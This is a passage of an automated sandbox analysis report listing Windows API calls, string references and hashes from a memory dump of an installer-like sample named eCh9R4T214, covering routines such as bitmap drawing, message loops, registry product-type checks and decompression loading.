                                                            • GetBitmapBits.GDI32(?,?,?), ref: 0041BFA6
                                                            • DeleteObject.GDI32(?), ref: 0041BFAF
                                                            • DeleteObject.GDI32(?), ref: 0041BFB8
                                                            • CreateIcon.USER32(00400000,?,?,?,?,?,?), ref: 0041BFD5
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.3384341389.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000001.00000002.3384304827.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000001.00000002.3384494472.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000001.00000002.3384583192.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000001.00000002.3384623423.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000001.00000002.3384662105.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_400000_eCh9R4T214.jbxd
                                                            Similarity
                                                            • API ID: Object$BitmapBitsDelete$CreateIcon
                                                            • String ID:
                                                            • API String ID: 1030595962-0
                                                            • Opcode ID: 5d40efa9a489d930f0c3474e6c583d61de37ea4c8bf925e82c26674748b1ae5a
                                                            • Instruction ID: 0934d86ca8fb123134a847d885dc0ae0ba41a9d0998c4bba382ea8cf266d8dc0
                                                            • Opcode Fuzzy Hash: 5d40efa9a489d930f0c3474e6c583d61de37ea4c8bf925e82c26674748b1ae5a
                                                            • Instruction Fuzzy Hash: 5A510571E00219AFCB14DFA9C8819EEBBF9EF48314B11442AF914E7391D738AD81CB64
                                                            APIs
                                                            • SetStretchBltMode.GDI32(00000000,00000003), ref: 0041CF0E
                                                            • 73EA4620.GDI32(00000000,00000026), ref: 0041CF2D
                                                            • 73E98830.GDI32(?,?,00000001,00000000,00000026), ref: 0041CF93
                                                            • 73E922A0.GDI32(?,?,?,00000001,00000000,00000026), ref: 0041CFA2
                                                            • StretchBlt.GDI32(00000000,?,?,?,?,?,00000000,00000000,00000000,?,?), ref: 0041D00C
                                                            • StretchDIBits.GDI32(?,?,?,?,?,00000000,00000000,00000000,?,?,?,00000000,?), ref: 0041D04A
                                                            • 73E98830.GDI32(?,?,00000001,0041D07C,00000000,00000026), ref: 0041D06F
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.3384341389.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000001.00000002.3384304827.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000001.00000002.3384494472.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000001.00000002.3384583192.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000001.00000002.3384623423.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000001.00000002.3384662105.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_400000_eCh9R4T214.jbxd
                                                            Similarity
                                                            • API ID: Stretch$E98830$A4620BitsE922Mode
                                                            • String ID:
                                                            • API String ID: 4209919087-0
                                                            • Opcode ID: ba9b00c7f19e374317db92bbaed8cea8fa7d56fa7ee5636777b85d926aa1c199
                                                            • Instruction ID: 415929d19c0355200a34ec50ec85ee50bdb26205500aadc12dd1df5ccaef5bc8
                                                            • Opcode Fuzzy Hash: ba9b00c7f19e374317db92bbaed8cea8fa7d56fa7ee5636777b85d926aa1c199
                                                            • Instruction Fuzzy Hash: 7A514EB0604200AFD714DFA9C995F9BBBF9EF08304F10859AB549DB292C779ED81CB58
                                                            APIs
                                                            • SendMessageA.USER32(00000000,?,?), ref: 00457166
                                                              • Part of subcall function 0042428C: GetWindowTextA.USER32(?,?,00000100), ref: 004242AC
                                                              • Part of subcall function 0041EEB4: GetCurrentThreadId.KERNEL32 ref: 0041EF03
                                                              • Part of subcall function 0041EEB4: 73EA5940.USER32(00000000,0041EE64,00000000,00000000,0041EF20,?,00000000,0041EF57,?,0042EEC0,?,00000001), ref: 0041EF09
                                                              • Part of subcall function 004242D4: SetWindowTextA.USER32(?,00000000), ref: 004242EC
                                                            • GetMessageA.USER32(?,00000000,00000000,00000000), ref: 004571CD
                                                            • TranslateMessage.USER32(?), ref: 004571EB
                                                            • DispatchMessageA.USER32(?), ref: 004571F4
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.3384341389.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000001.00000002.3384304827.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000001.00000002.3384494472.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000001.00000002.3384583192.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000001.00000002.3384623423.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000001.00000002.3384662105.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_400000_eCh9R4T214.jbxd
                                                            Similarity
                                                            • API ID: Message$TextWindow$A5940CurrentDispatchSendThreadTranslate
                                                            • String ID: [Paused]
                                                            • API String ID: 1715333840-4230553315
                                                            • Opcode ID: a723b0617cbdde8b0455b730e79db8c0792bcf361dff27c4d69091156c9f8888
                                                            • Instruction ID: cc82e29175726c0716c689c1ffa83d11e9869aeff1ced20ba9c80888b84e3111
                                                            • Opcode Fuzzy Hash: a723b0617cbdde8b0455b730e79db8c0792bcf361dff27c4d69091156c9f8888
                                                            • Instruction Fuzzy Hash: 013196309082489EDB11DBB5EC81FDEBBB8DB49314F5540B7F800E7292D67C9909CB69
                                                            APIs
                                                            • GetCursor.USER32(00000000,0046B897), ref: 0046B814
                                                            • LoadCursorA.USER32(00000000,00007F02), ref: 0046B822
                                                            • SetCursor.USER32(00000000,00000000,00007F02,00000000,0046B897), ref: 0046B828
                                                            • Sleep.KERNEL32(000002EE,00000000,00000000,00007F02,00000000,0046B897), ref: 0046B832
                                                            • SetCursor.USER32(00000000,000002EE,00000000,00000000,00007F02,00000000,0046B897), ref: 0046B838
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.3384341389.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000001.00000002.3384304827.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000001.00000002.3384494472.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000001.00000002.3384583192.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000001.00000002.3384623423.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000001.00000002.3384662105.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_400000_eCh9R4T214.jbxd
                                                            Similarity
                                                            • API ID: Cursor$LoadSleep
                                                            • String ID: CheckPassword
                                                            • API String ID: 4023313301-1302249611
                                                            • Opcode ID: 653d9654f76fc9f2c348947714f395caa5fd1a5bea1654e8e7fe328d35dfe1b3
                                                            • Instruction ID: aec6a0205c5a75bc54f0fc291e1a1f9730d999611bc1887dd1e74dc6007ab6bd
                                                            • Opcode Fuzzy Hash: 653d9654f76fc9f2c348947714f395caa5fd1a5bea1654e8e7fe328d35dfe1b3
                                                            • Instruction Fuzzy Hash: 333164346406049FD711EB69C889F9E7BE4EF49304F5580B6F844DB3A2D778AD40CB99
                                                            APIs
                                                              • Part of subcall function 00477AB0: GetWindowThreadProcessId.USER32(00000000), ref: 00477AB8
                                                              • Part of subcall function 00477AB0: GetModuleHandleA.KERNEL32(user32.dll,AllowSetForegroundWindow,00000000,?,?,00477BAF,0049C0A4,00000000), ref: 00477ACB
                                                              • Part of subcall function 00477AB0: GetProcAddress.KERNEL32(00000000,user32.dll), ref: 00477AD1
                                                            • SendMessageA.USER32(00000000,0000004A,00000000,00477F42), ref: 00477BBD
                                                            • GetTickCount.KERNEL32 ref: 00477C02
                                                            • GetTickCount.KERNEL32 ref: 00477C0C
                                                            • MsgWaitForMultipleObjects.USER32(00000000,00000000,00000000,0000000A,000000FF), ref: 00477C61
                                                            Strings
                                                            • CallSpawnServer: Unexpected status: %d, xrefs: 00477C4A
                                                            • CallSpawnServer: Unexpected response: $%x, xrefs: 00477BF2
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.3384341389.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000001.00000002.3384304827.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000001.00000002.3384494472.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000001.00000002.3384583192.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000001.00000002.3384623423.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000001.00000002.3384662105.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_400000_eCh9R4T214.jbxd
                                                            Similarity
                                                            • API ID: CountTick$AddressHandleMessageModuleMultipleObjectsProcProcessSendThreadWaitWindow
                                                            • String ID: CallSpawnServer: Unexpected response: $%x$CallSpawnServer: Unexpected status: %d
                                                            • API String ID: 613034392-3771334282
                                                            • Opcode ID: 56bd6ace22e6e2035f5031cc9978de37ae905e15686cac3f17074c750df7538a
                                                            • Instruction ID: 65d184c56696bd8d6baefe4a5ac293f093c2dd543b1706e930bc299cdf77f89e
                                                            • Opcode Fuzzy Hash: 56bd6ace22e6e2035f5031cc9978de37ae905e15686cac3f17074c750df7538a
                                                            • Instruction Fuzzy Hash: B131A474B042149ADB11EBB988867EEB6A09F48304F90C47AF548EB392D67C9E41879D
                                                            APIs
                                                            • GetProcAddress.KERNEL32(626D6573,CreateAssemblyCache), ref: 00459BA3
                                                            Strings
                                                            • .NET Framework CreateAssemblyCache function failed, xrefs: 00459BC6
                                                            • Failed to load .NET Framework DLL "%s", xrefs: 00459B88
                                                            • Failed to get address of .NET Framework CreateAssemblyCache function, xrefs: 00459BAE
                                                            • Fusion.dll, xrefs: 00459B43
                                                            • CreateAssemblyCache, xrefs: 00459B9A
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.3384341389.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000001.00000002.3384304827.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000001.00000002.3384494472.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000001.00000002.3384583192.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000001.00000002.3384623423.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000001.00000002.3384662105.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_400000_eCh9R4T214.jbxd
                                                            Similarity
                                                            • API ID: AddressProc
                                                            • String ID: .NET Framework CreateAssemblyCache function failed$CreateAssemblyCache$Failed to get address of .NET Framework CreateAssemblyCache function$Failed to load .NET Framework DLL "%s"$Fusion.dll
                                                            • API String ID: 190572456-3990135632
                                                            • Opcode ID: edece01ff0b44ec29f5677049ed357158d3b305d3ba0728d372a41e2f192b5a4
                                                            • Instruction ID: 1db31b6b51e2e068c3f61674d824012408e1fbc1d182cf764eafebb5ab4ea00f
                                                            • Opcode Fuzzy Hash: edece01ff0b44ec29f5677049ed357158d3b305d3ba0728d372a41e2f192b5a4
                                                            • Instruction Fuzzy Hash: EF318970E00619EBDB01EFA5C88169EB7B8AF44315F50857BE814E7382D738AE09C799
                                                            APIs
                                                              • Part of subcall function 0041C058: GetObjectA.GDI32(?,00000018), ref: 0041C065
                                                            • GetFocus.USER32 ref: 0041C178
                                                            • 73E9A570.USER32(?), ref: 0041C184
                                                            • 73E98830.GDI32(?,?,00000000,00000000,0041C203,?,?), ref: 0041C1A5
                                                            • 73E922A0.GDI32(?,?,?,00000000,00000000,0041C203,?,?), ref: 0041C1B1
                                                            • GetDIBits.GDI32(?,?,00000000,?,?,?,00000000), ref: 0041C1C8
                                                            • 73E98830.GDI32(?,00000000,00000000,0041C20A,?,?), ref: 0041C1F0
                                                            • 73E9A480.USER32(?,?,0041C20A,?,?), ref: 0041C1FD
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.3384341389.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000001.00000002.3384304827.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000001.00000002.3384494472.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000001.00000002.3384583192.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000001.00000002.3384623423.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000001.00000002.3384662105.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_400000_eCh9R4T214.jbxd
                                                            Similarity
                                                            • API ID: E98830$A480A570BitsE922FocusObject
                                                            • String ID:
                                                            • API String ID: 2688936647-0
                                                            • Opcode ID: 32c019c2b17a625013bd7d07803e420f9d7b692fe3dc5f877fb11705181084ab
                                                            • Instruction ID: a51b9c7cee13939b32e911f1849152ebfa7eb0d73570b73294f05c7218cf190f
                                                            • Opcode Fuzzy Hash: 32c019c2b17a625013bd7d07803e420f9d7b692fe3dc5f877fb11705181084ab
                                                            • Instruction Fuzzy Hash: A0116A71E40609BBDB10DBE9CC85FAFBBFCEF48700F54446AB518E7281D67899008B28
                                                            APIs
                                                            • GetSystemMetrics.USER32(0000000E), ref: 00418C80
                                                            • GetSystemMetrics.USER32(0000000D), ref: 00418C88
                                                            • 6F9A2980.COMCTL32(00000000,0000000D,00000000,0000000E,00000001,00000001,00000001,00000000), ref: 00418C8E
                                                              • Part of subcall function 004099C0: 6F99C400.COMCTL32(0049B628,000000FF,00000000,00418CBC,00000000,00418D18,?,00000000,0000000D,00000000,0000000E,00000001,00000001,00000001,00000000), ref: 004099C4
                                                            • 6FA0CB00.COMCTL32(0049B628,00000000,00000000,00000000,00000000,00418D18,?,00000000,0000000D,00000000,0000000E,00000001,00000001,00000001,00000000), ref: 00418CDE
                                                            • 6FA0C740.COMCTL32(00000000,?,0049B628,00000000,00000000,00000000,00000000,00418D18,?,00000000,0000000D,00000000,0000000E,00000001,00000001,00000001), ref: 00418CE9
                                                            • 6FA0CB00.COMCTL32(0049B628,00000001,?,?,00000000,?,0049B628,00000000,00000000,00000000,00000000,00418D18,?,00000000,0000000D,00000000), ref: 00418CFC
                                                            • 6F9A0860.COMCTL32(0049B628,00418D1F,?,00000000,?,0049B628,00000000,00000000,00000000,00000000,00418D18,?,00000000,0000000D,00000000,0000000E), ref: 00418D12
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.3384341389.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000001.00000002.3384304827.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000001.00000002.3384494472.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000001.00000002.3384583192.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000001.00000002.3384623423.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000001.00000002.3384662105.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_400000_eCh9R4T214.jbxd
                                                            Similarity
                                                            • API ID: MetricsSystem$A0860A2980C400C740
                                                            • String ID:
                                                            • API String ID: 1086221473-0
                                                            • Opcode ID: 33c04b7a68779a44c69ffbd8ad79940853ad3b201d45ee57610259a2e4dbeb77
                                                            • Instruction ID: e0b43fe86d74620756cf035266125a11838772e9d6ef4bcae2e69295d5b8951d
                                                            • Opcode Fuzzy Hash: 33c04b7a68779a44c69ffbd8ad79940853ad3b201d45ee57610259a2e4dbeb77
                                                            • Instruction Fuzzy Hash: A11149B1744204BBEB10EBA9DC83F5E73B8DB48704F6044BAB604E72D2DB799D409759
                                                            APIs
                                                              • Part of subcall function 0042DE2C: RegOpenKeyExA.ADVAPI32(80000002,System\CurrentControlSet\Control\Windows,c6H,?,00000001,?,?,00483663,?,00000001,00000000), ref: 0042DE48
                                                            • RegCloseKey.ADVAPI32(?,?,00000001,00000000,00000000,004837A4), ref: 00483789
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.3384341389.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000001.00000002.3384304827.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000001.00000002.3384494472.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000001.00000002.3384583192.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000001.00000002.3384623423.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000001.00000002.3384662105.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_400000_eCh9R4T214.jbxd
                                                            Similarity
                                                            • API ID: CloseOpen
                                                            • String ID: LanmanNT$ProductType$ServerNT$System\CurrentControlSet\Control\ProductOptions$WinNT
                                                            • API String ID: 47109696-2530820420
                                                            • Opcode ID: ae1742725748cd88b87d9fe0d1248e5a5e1a514a3c9083b9a236ca5d7aa17843
                                                            • Instruction ID: 8316402a246994b7737153b66ed252a9f16b12b2be78e08e0fa98e077eb8f510
                                                            • Opcode Fuzzy Hash: ae1742725748cd88b87d9fe0d1248e5a5e1a514a3c9083b9a236ca5d7aa17843
                                                            • Instruction Fuzzy Hash: 0311B1B4704244AADB10FF65CC52B5E7AE9DB41B19F60C87BA400A7282EB38CA05875C
                                                            APIs
                                                            • 73E9A570.USER32(00000000,?,?,00000000), ref: 00494EE9
                                                              • Part of subcall function 0041A1F8: CreateFontIndirectA.GDI32(?), ref: 0041A2B7
                                                            • SelectObject.GDI32(00000000,00000000), ref: 00494F0B
                                                            • GetTextExtentPointA.GDI32(00000000,ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz,00000034,00495489), ref: 00494F1F
                                                            • GetTextMetricsA.GDI32(00000000,?), ref: 00494F41
                                                            • 73E9A480.USER32(00000000,00000000,00494F6B,00494F64,?,00000000,?,?,00000000), ref: 00494F5E
                                                            Strings
                                                            • ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz, xrefs: 00494F16
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.3384341389.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000001.00000002.3384304827.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000001.00000002.3384494472.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000001.00000002.3384583192.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000001.00000002.3384623423.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000001.00000002.3384662105.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_400000_eCh9R4T214.jbxd
                                                            Similarity
                                                            • API ID: Text$A480A570CreateExtentFontIndirectMetricsObjectPointSelect
                                                            • String ID: ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz
                                                            • API String ID: 1435929781-222967699
                                                            • Opcode ID: f7d6f97b91dc48adac3cf3527b9ba73e93ee7bba49e4f60ed72cccac08d23d6d
                                                            • Instruction ID: 6f18d4fe6cef93123b0455e30b82395b7dbfc0c8f911bccc88a8e51c4d6277b1
                                                            • Opcode Fuzzy Hash: f7d6f97b91dc48adac3cf3527b9ba73e93ee7bba49e4f60ed72cccac08d23d6d
                                                            • Instruction Fuzzy Hash: 95018476A04609BFEB00DBA9CC41F5EB7ECDB89704F51447AB600E7281D678AE018B28
                                                            APIs
                                                            • SelectObject.GDI32(00000000,?), ref: 0041B480
                                                            • SelectObject.GDI32(?,00000000), ref: 0041B48F
                                                            • StretchBlt.GDI32(?,00000000,00000000,0000000B,?,00000000,00000000,00000000,?,?,00CC0020), ref: 0041B4BB
                                                            • SelectObject.GDI32(00000000,00000000), ref: 0041B4C9
                                                            • SelectObject.GDI32(?,00000000), ref: 0041B4D7
                                                            • DeleteDC.GDI32(00000000), ref: 0041B4E0
                                                            • DeleteDC.GDI32(?), ref: 0041B4E9
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.3384341389.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000001.00000002.3384304827.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000001.00000002.3384494472.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000001.00000002.3384583192.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000001.00000002.3384623423.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000001.00000002.3384662105.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_400000_eCh9R4T214.jbxd
                                                            Similarity
                                                            • API ID: ObjectSelect$Delete$Stretch
                                                            • String ID:
                                                            • API String ID: 1458357782-0
                                                            • Opcode ID: 72b6a28bf9d60e237e3396a0a8e2fc7d77968e10b7c0149e345d15a7b5d8e936
                                                            • Instruction ID: 28529174ed8a1a36c66279ad8c479dcd7ed434ba0fbaa502c63cdd0cc078bbc5
                                                            • Opcode Fuzzy Hash: 72b6a28bf9d60e237e3396a0a8e2fc7d77968e10b7c0149e345d15a7b5d8e936
                                                            • Instruction Fuzzy Hash: A1114C72E40559ABDF10D6D9D885FAFB3BCEF08704F048456B614FB241C678A8418B54
                                                            APIs
                                                            • GetCursorPos.USER32 ref: 004233BF
                                                            • WindowFromPoint.USER32(?,?), ref: 004233CC
                                                            • GetWindowThreadProcessId.USER32(00000000,00000000), ref: 004233DA
                                                            • GetCurrentThreadId.KERNEL32 ref: 004233E1
                                                            • SendMessageA.USER32(00000000,00000084,?,?), ref: 004233FA
                                                            • SendMessageA.USER32(00000000,00000020,00000000,00000000), ref: 00423411
                                                            • SetCursor.USER32(00000000), ref: 00423423
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.3384341389.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000001.00000002.3384304827.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000001.00000002.3384494472.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000001.00000002.3384583192.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000001.00000002.3384623423.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000001.00000002.3384662105.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_400000_eCh9R4T214.jbxd
                                                            Similarity
                                                            • API ID: CursorMessageSendThreadWindow$CurrentFromPointProcess
                                                            • String ID:
                                                            • API String ID: 1770779139-0
                                                            • Opcode ID: 5751e80311b49702528c8fc5ff8f7f3a6fa30eb8cde205135d5a5ff58115ab5c
                                                            • Instruction ID: 219e0d69ac6b6a38dcb61baa39fbc914f783b163521ae56cddb293ea60412e1c
                                                            • Opcode Fuzzy Hash: 5751e80311b49702528c8fc5ff8f7f3a6fa30eb8cde205135d5a5ff58115ab5c
                                                            • Instruction Fuzzy Hash: E601D42230472036D6217B795C86E2F26A8CFC5B15F50457FB649BB283DA3D8C0063BD
                                                            APIs
                                                            • GetModuleHandleA.KERNEL32(user32.dll), ref: 00494D0C
                                                            • GetProcAddress.KERNEL32(00000000,MonitorFromRect), ref: 00494D19
                                                            • GetProcAddress.KERNEL32(00000000,GetMonitorInfoA), ref: 00494D26
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.3384341389.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000001.00000002.3384304827.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000001.00000002.3384494472.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000001.00000002.3384583192.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000001.00000002.3384623423.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000001.00000002.3384662105.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_400000_eCh9R4T214.jbxd
                                                            Similarity
                                                            • API ID: AddressProc$HandleModule
                                                            • String ID: GetMonitorInfoA$MonitorFromRect$user32.dll
                                                            • API String ID: 667068680-2254406584
                                                            • Opcode ID: 70207861a9ddbbfcf1ec4c2ebf1ed82301f215222d5c3051e71e037128298d5d
                                                            • Instruction ID: 42226921e916c2e61715a17367c32eae2b2292ab525ca03b869d6a68ec0a34c4
                                                            • Opcode Fuzzy Hash: 70207861a9ddbbfcf1ec4c2ebf1ed82301f215222d5c3051e71e037128298d5d
                                                            • Instruction Fuzzy Hash: 6CF0F69AB41B1466DA2025B68C81F7B698CCFD1B71F050337BE04A7382ED9D8D0642AD
                                                            APIs
                                                            • GetProcAddress.KERNEL32(00000000,BZ2_bzDecompressInit), ref: 0045D9F5
                                                            • GetProcAddress.KERNEL32(00000000,BZ2_bzDecompress), ref: 0045DA05
                                                            • GetProcAddress.KERNEL32(00000000,BZ2_bzDecompressEnd), ref: 0045DA15
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.3384341389.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000001.00000002.3384304827.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000001.00000002.3384494472.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000001.00000002.3384583192.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000001.00000002.3384623423.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000001.00000002.3384662105.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_400000_eCh9R4T214.jbxd
                                                            Similarity
                                                            • API ID: AddressProc
                                                            • String ID: BZ2_bzDecompress$BZ2_bzDecompressEnd$BZ2_bzDecompressInit
                                                            • API String ID: 190572456-212574377
                                                            • Opcode ID: 01040e06415ef817a4763b016626a28be3372e477bb5bd5db3809bf0997a53ea
                                                            • Instruction ID: e47ea2fb967bc5a05fa6d8d3c64fcba096cc564050e4d812c51f788cc71ed1ca
                                                            • Opcode Fuzzy Hash: 01040e06415ef817a4763b016626a28be3372e477bb5bd5db3809bf0997a53ea
                                                            • Instruction Fuzzy Hash: 2BF030B0D05300DFEB24DFB29CC372336959BA4316F14803B9A0D96267D278088CCE2C
                                                            APIs
                                                            • GetModuleHandleA.KERNEL32(user32.dll,ChangeWindowMessageFilterEx,00000004,00499934,00457029,004573CC,00456F80,00000000,00000B06,00000000,00000000,00000001,00000000,00000002,00000000,00480D8E), ref: 0042EA45
                                                            • GetProcAddress.KERNEL32(00000000,user32.dll), ref: 0042EA4B
                                                            • InterlockedExchange.KERNEL32(0049B668,00000001), ref: 0042EA5C
                                                              • Part of subcall function 0042E9BC: GetModuleHandleA.KERNEL32(user32.dll,ChangeWindowMessageFilter,?,0042EA80,00000004,00499934,00457029,004573CC,00456F80,00000000,00000B06,00000000,00000000,00000001,00000000,00000002), ref: 0042E9D2
                                                              • Part of subcall function 0042E9BC: GetProcAddress.KERNEL32(00000000,user32.dll), ref: 0042E9D8
                                                              • Part of subcall function 0042E9BC: InterlockedExchange.KERNEL32(0049B660,00000001), ref: 0042E9E9
